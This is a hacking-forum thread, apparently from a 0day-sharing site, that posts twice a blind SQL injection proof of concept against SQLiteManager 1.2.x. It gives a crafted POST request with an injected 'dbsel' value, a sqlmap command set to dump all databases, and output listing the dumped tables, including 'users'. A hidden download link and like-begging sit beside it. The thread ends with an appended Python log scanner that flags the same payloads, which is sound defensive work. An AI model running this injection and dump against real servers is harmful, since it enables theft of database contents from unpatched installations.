SQLi/Dork - SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection Vulnerability

0dayhacker

Member
Joined
Jul 8, 2023
Threads
13
Likes
11
Awards
4
Website
crax.pro
Credits
1,440©
Cash
0$
Risk: [Security Risk High] 0day-ID-33164 Category: web applications Platform: php
1. Description

SQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php
dbsel parameter. NOTE: This product is discontinued.
---------------------------------------------------------------------------------
2. Proof of Concept

Detect:
----------------------------------------------------------------------------------
Save the next post in a file: sqli.txt

Code:
POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1
Content-Length: 191
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3; SQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8; SQLiteManager_fullText=0; SQLiteManager_HTMLon=0
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

action=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1


Code:
$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all

#boom

[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
[11:58:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dbsel (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dbsel=-4019 OR 7689=7689
---
[11:58:27] [INFO] the back-end DBMS is SQLite
web server operating system: Windows
web application technology: PHP X.X.X, Apache 2.X.X
back-end DBMS: SQLite
[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases now
[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[11:58:27] [WARNING] reflective value(s) found and filtering out
[11:58:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:58:27] [INFO] retrieved: 5
[11:58:27] [INFO] retrieved: database
[11:58:28] [INFO] retrieved: user_function
[11:58:30] [INFO] retrieved: attachment
[11:58:31] [INFO] retrieved: groupes
[11:58:32] [INFO] retrieved: users

like this post and Reply pls thanks for you
yumiao001

Member
Joined
May 1, 2022
Threads
10
Likes
0
Awards
2
Credits
2,057©
Cash
0$
Risk: [Security Risk High] 0day-ID-33164 Category: web applications Platform: php
1. Description

SQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php
dbsel parameter. NOTE: This product is discontinued.
---------------------------------------------------------------------------------
2. Proof of Concept

Detect:
----------------------------------------------------------------------------------
Save the next post in a file: sqli.txt

Code:
POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1

Content-Length: 191

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;

SQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;

SQLiteManager_fullText=0; SQLiteManager_HTMLon=0

Host: localhost

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;

Trident/5.0)

 

action=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1


Code:
$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all

#boom

[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
[11:58:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dbsel (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dbsel=-4019 OR 7689=7689
---
[11:58:27] [INFO] the back-end DBMS is SQLite
web server operating system: Windows
web application technology: PHP X.X.X, Apache 2.X.X
back-end DBMS: SQLite
[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases
now
[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[11:58:27] [WARNING] reflective value(s) found and filtering out
[11:58:27] [WARNING] running in a single-thread mode. Please consider usage
of o
ption '--threads' for faster data retrieval
[11:58:27] [INFO] retrieved: 5
[11:58:27] [INFO] retrieved: database
[11:58:28] [INFO] retrieved: user_function
[11:58:30] [INFO] retrieved: attachment
[11:58:31] [INFO] retrieved: groupes
[11:58:32] [INFO] retrieved: users

like this post and Reply pls thanks for you
--------------------------------------------------------------------------------------------------------------------------------------------
ADD AN IMAGE HERE! [Not adding an image will result in removal]
Then remove these lines.

Download:



*** Hidden text: cannot be quoted. ***

View attachment 102161
thanks
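
A defensive check for the issue reported in this thread, added here as an example and not part of any forum post or of SQLiteManager's code: it scans web-server access logs for main.php requests whose dbsel value is not a plain integer. The log lines are constructed, and treating a legitimate dbsel as a non-negative integer id is an assumption; the same predicate can serve as server-side input validation.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache access-log style (not from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [08/Jul/2023:11:58:20 +0000] "GET /sqlitemanager/main.php?dbsel=2 HTTP/1.1" 200 5120
192.0.2.44 - - [08/Jul/2023:11:58:27 +0000] "POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1" 200 4801
192.0.2.44 - - [08/Jul/2023:11:58:27 +0000] "POST /sqlite/main.php?dbsel=-4019%20OR%207689%3D7689 HTTP/1.1" 200 5120
192.0.2.10 - - [08/Jul/2023:11:59:02 +0000] "GET /sqlitemanager/index.php HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate dbsel is a non-negative integer database id.
PLAIN_ID_RE = re.compile(r"[0-9]+")


def is_valid_dbsel(value: str) -> bool:
    """True only if the whole (already URL-decoded) value is digits."""
    return PLAIN_ID_RE.fullmatch(value) is not None


def suspicious_dbsel_requests(log_text: str):
    """Return (line number, client address, decoded dbsel) for each bad value."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/main.php"):
            continue
        # parse_qs URL-decodes values; keep_blank_values so "dbsel=" is inspected too.
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("dbsel", []):
            if not is_valid_dbsel(value):
                findings.append((lineno, line.split()[0], value))
    return findings


if __name__ == "__main__":
    for lineno, client, value in suspicious_dbsel_requests(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent non-integer dbsel {value!r}")
```
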
 
